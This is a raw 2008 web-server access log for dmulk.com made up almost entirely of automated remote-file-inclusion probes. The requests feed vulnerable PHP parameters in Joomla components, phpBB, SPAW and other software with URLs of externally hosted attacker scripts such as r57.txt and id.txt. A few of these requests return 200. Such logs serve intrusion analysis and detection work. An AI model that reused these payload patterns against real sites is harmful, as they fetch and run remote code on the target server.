190.54.17.4 - - [29/Nov/2008:09:08:19 -0800] "GET /logs/access_081017.log//include/lib.inc.php?site_path=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.228.242.67 - - [29/Nov/2008:09:08:24 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.228.242.67 - - [29/Nov/2008:09:08:24 -0800] "GET /logs/access_080524.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.228.242.67 - - [29/Nov/2008:09:08:24 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.135.105.175 - - [29/Nov/2008:09:08:59 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.thatfhatass.com/photorate3/pics/hexguyEH8NF.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.135.105.175 - - [29/Nov/2008:09:09:00 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.thatfhatass.com/photorate3/pics/hexguyEH8NF.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:09:00 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:09:00 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:09:00 -0800] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:09:09:04 -0800] "GET /logs/access_080523.log%20%20//components/errors.php?error=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:09:09:04 -0800] "GET /logs/access_080522.log%20%20//components/errors.php?error=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:09:09 -0800] "GET /logs/access_071221.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.232.122.239 - - [29/Nov/2008:09:09:13 -0800] "GET /logs/access_080524.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
190.54.17.4 - - [29/Nov/2008:09:09:15 -0800] "GET /components/errors.php?error=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:09:15 -0800] "GET /logs/access_080824.log//pjsfiles/modify.php?installed_config_file=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:09:15 -0800] "GET /logs/access_080816.log//pjsfiles/modify.php?installed_config_file=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:09:16 -0800] "GET /pjsfiles/modify.php?installed_config_file=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:09:16 -0800] "GET /logs//pjsfiles/modify.php?installed_config_file=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:09:16 -0800] "GET /logs/access_080816.log//pjsfiles/modify.php?installed_config_file=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:09:16 -0800] "GET /logs//pjsfiles/modify.php?installed_config_file=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:09:16 -0800] "GET /pjsfiles/modify.php?installed_config_file=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:09:16 -0800] "GET /logs/access_080824.log//pjsfiles/modify.php?installed_config_file=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.135.105.175 - - [29/Nov/2008:09:09:17 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.thatfhatass.com/photorate3/pics/hexguyEH8NF.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.232.122.239 - - [29/Nov/2008:09:09:17 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
194.135.105.175 - - [29/Nov/2008:09:09:18 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.thatfhatass.com/photorate3/pics/hexguyEH8NF.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.232.122.239 - - [29/Nov/2008:09:09:20 -0800] "GET /logs/access_080524.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.232.122.239 - - [29/Nov/2008:09:09:21 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.29.78.145 - - [29/Nov/2008:09:09:27 -0800] "GET /Forums/admin/admin_board.php?phpbb_root_path=http://www.doggytown.de/components/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.78.145 - - [29/Nov/2008:09:09:27 -0800] "GET /logs/access_080521.log//Forums/admin/admin_board.php?phpbb_root_path=http://www.doggytown.de/components/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.78.145 - - [29/Nov/2008:09:09:27 -0800] "GET /logs//Forums/admin/admin_board.php?phpbb_root_path=http://www.doggytown.de/components/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.78.145 - - [29/Nov/2008:09:09:36 -0800] "GET /logs/access_080509.log//Forums/admin/admin_board.php?phpbb_root_path=http://www.doggytown.de/components/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.135.105.175 - - [29/Nov/2008:09:09:43 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.thatfhatass.com/photorate3/pics/hexguyEH8NF.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.135.105.175 - - [29/Nov/2008:09:09:43 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.thatfhatass.com/photorate3/pics/hexguyEH8NF.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:09:49 -0800] "GET /logs/access_080828.log/errors.php?error=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:09:50 -0800] "GET /errors.php?error=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:09:50 -0800] "GET /logs/errors.php?error=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.135.105.175 - - [29/Nov/2008:09:10:00 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.thatfhatass.com/photorate3/pics/hexguyEH8NF.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.135.105.175 - - [29/Nov/2008:09:10:01 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.thatfhatass.com/photorate3/pics/hexguyEH8NF.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.135.105.175 - - [29/Nov/2008:09:10:16 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.thatfhatass.com/photorate3/pics/hexguyEH8NF.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.135.105.175 - - [29/Nov/2008:09:10:16 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.thatfhatass.com/photorate3/pics/hexguyEH8NF.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.135.105.175 - - [29/Nov/2008:09:10:16 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.thatfhatass.com/photorate3/pics/hexguyEH8NF.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.135.105.175 - - [29/Nov/2008:09:10:16 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.thatfhatass.com/photorate3/pics/hexguyEH8NF.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:09:10:29 -0800] "GET /logs/access_080524.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:09:10:29 -0800] "GET /logs/access_080524.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:09:10:29 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:09:10:29 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
88.151.32.254 - - [29/Nov/2008:09:10:30 -0800] "GET /logs/access_080722.log//signup//announcements.php?phpraid_dir=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.65.114 - - [29/Nov/2008:09:10:33 -0800] "GET /logs/access_080411.log%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/rinaputria/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [29/Nov/2008:09:10:33 -0800] "GET /logs/access_080406.log%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/rinaputria/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [29/Nov/2008:09:10:43 -0800] "GET /logs/access_080411.log%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [29/Nov/2008:09:10:44 -0800] "GET /logs/access_080406.log%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.135.105.175 - - [29/Nov/2008:09:10:46 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.thatfhatass.com/photorate3/pics/hexguyEH8NF.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.135.105.175 - - [29/Nov/2008:09:10:46 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.thatfhatass.com/photorate3/pics/hexguyEH8NF.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.219.198.195 - - [29/Nov/2008:09:10:53 -0800] "GET /logs/access_081008.log/errors.php?error=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.219.198.195 - - [29/Nov/2008:09:10:53 -0800] "GET /errors.php?error=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.219.198.195 - - [29/Nov/2008:09:10:54 -0800] "GET /logs/errors.php?error=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.44.72.229 - - [29/Nov/2008:09:11:04 -0800] "GET /logs/access_080304.log//include.php?path%5Bdocroot%5D=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.229 - - [29/Nov/2008:09:11:04 -0800] "GET /include.php?path%5Bdocroot%5D=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.229 - - [29/Nov/2008:09:11:04 -0800] "GET /logs//include.php?path%5Bdocroot%5D=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.229 - - [29/Nov/2008:09:11:04 -0800] "GET /logs/access_080430.log//include.php?path%5Bdocroot%5D=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.54.41 - - [29/Nov/2008:09:11:15 -0800] "GET /logs/access_080824.log/errors.php?error=http://www.zhepb.gov.cn/idfeel.txt?%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
67.15.54.41 - - [29/Nov/2008:09:11:15 -0800] "GET /logs/errors.php?error=http://www.zhepb.gov.cn/idfeel.txt?%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:09:11:20 -0800] "GET /logs/index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:11:22 -0800] "GET /logs/access_080408.log/lostpasswd.php?env[include_prefix]=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:09:11:24 -0800] "GET /index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 200 94834 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:11:29 -0800] "GET /logs/access_080910.log//pjsfiles/modify.php?installed_config_file=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.54.16.82 - - [29/Nov/2008:09:11:31 -0800] "GET /logs/access_080201.log//vwar/admin/admin.php?vwar_root=http://sior.org/zero/build/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.16.82 - - [29/Nov/2008:09:11:31 -0800] "GET /vwar/admin/admin.php?vwar_root=http://sior.org/zero/build/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.16.82 - - [29/Nov/2008:09:11:31 -0800] "GET /logs//vwar/admin/admin.php?vwar_root=http://sior.org/zero/build/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.16.82 - - [29/Nov/2008:09:11:32 -0800] "GET /logs/access_080127.log//vwar/admin/admin.php?vwar_root=http://sior.org/zero/build/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.151.32.254 - - [29/Nov/2008:09:11:42 -0800] "GET /logs/access_080421.log/playing.php/common/db.php?commonpath=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.151.32.254 - - [29/Nov/2008:09:11:43 -0800] "GET /playing.php/common/db.php?commonpath=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.151.32.254 - - [29/Nov/2008:09:11:43 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.117.252.226 - - [29/Nov/2008:09:12:00 -0800] "GET /errors.php?error=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:09:12:16 -0800] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://189.19.199.119/bit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:09:12:17 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://189.19.199.119/bit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:12:20 -0800] "GET /logs/access_080412.log/lostpasswd.php?env[include_prefix]=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.246.58.58 - - [29/Nov/2008:09:12:22 -0800] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://189.19.199.119/bit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.219.198.195 - - [29/Nov/2008:09:12:26 -0800] "GET /logs/access_081008.log/errors.php?error=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.219.198.195 - - [29/Nov/2008:09:12:27 -0800] "GET /errors.php?error=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.219.198.195 - - [29/Nov/2008:09:12:27 -0800] "GET /logs/errors.php?error=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.54.41 - - [29/Nov/2008:09:12:34 -0800] "GET /logs/access_080515.log/errors.php?error=http://www.zhepb.gov.cn/idfeel.txt?%0D? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
217.147.211.194 - - [29/Nov/2008:09:12:35 -0800] "GET /logs/access_080618.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.147.211.194 - - [29/Nov/2008:09:12:35 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.147.211.194 - - [29/Nov/2008:09:12:36 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:12:38 -0800] "GET /logs/access_080910.log//pjsfiles/modify.php?installed_config_file=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:09:12:41 -0800] "GET /logs/index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:09:12:42 -0800] "GET /index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 200 94834 "-" "libwww-perl/5.79" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:09:12:43 -0800] "GET /logs/index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:09:12:44 -0800] "GET /index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 200 94850 "-" "libwww-perl/5.79" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:09:12:54 -0800] "GET /logs/index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:09:12:55 -0800] "GET /index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 200 94850 "-" "libwww-perl/5.79" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:09:13:09 -0800] "GET /logs/index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:09:13:10 -0800] "GET /index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 200 94834 "-" "libwww-perl/5.79" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:09:13:22 -0800] "GET /logs/access_080523.log//components/errors.php?error=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:09:13:22 -0800] "GET /components/errors.php?error=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:09:13:22 -0800] "GET /logs//components/errors.php?error=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.10.29 - - [29/Nov/2008:09:13:22 -0800] "GET /logs/access_080522.log//components/errors.php?error=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.14.120.73 - - [29/Nov/2008:09:13:32 -0800] "GET /logs/access_080816.log//pjsfiles/modify.php?installed_config_file=http://www.isacurvelo.com.br/images/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.14.120.73 - - [29/Nov/2008:09:13:32 -0800] "GET /pjsfiles/modify.php?installed_config_file=http://www.isacurvelo.com.br/images/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
216.14.120.73 - - [29/Nov/2008:09:13:32 -0800] "GET /logs//pjsfiles/modify.php?installed_config_file=http://www.isacurvelo.com.br/images/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:13:39 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:13:39 -0800] "GET /logs/access_081008.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:13:39 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.219.198.195 - - [29/Nov/2008:09:13:48 -0800] "GET /logs/access_080903.log/errors.php?error=http://ragas.baarleweb.net/data/bid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.228.242.67 - - [29/Nov/2008:09:13:51 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.228.242.67 - - [29/Nov/2008:09:13:51 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.228.242.67 - - [29/Nov/2008:09:13:58 -0800] "GET /logs/access_080301.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.55.211.31 - - [29/Nov/2008:09:14:00 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
203.228.242.67 - - [29/Nov/2008:09:14:03 -0800] "GET /logs/access_080301.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:09:14:06 -0800] "GET /logs/index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.27.114.10 - - [29/Nov/2008:09:14:08 -0800] "GET /index.php?option=com_custompages&cpage=http://www.reviewtrust.co.uk/r57.txt?? HTTP/1.1" 200 94818 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.31 - - [29/Nov/2008:09:14:08 -0800] "GET /blog/index.php/2008/08/ HTTP/1.1" 200 77121 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:14:08 -0800] "GET /logs/access_081008.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:14:08 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:14:09 -0800] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:14:11 -0800] "GET /logs/access_080127.log/errors.php?error=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.228.242.67 - - [29/Nov/2008:09:14:16 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
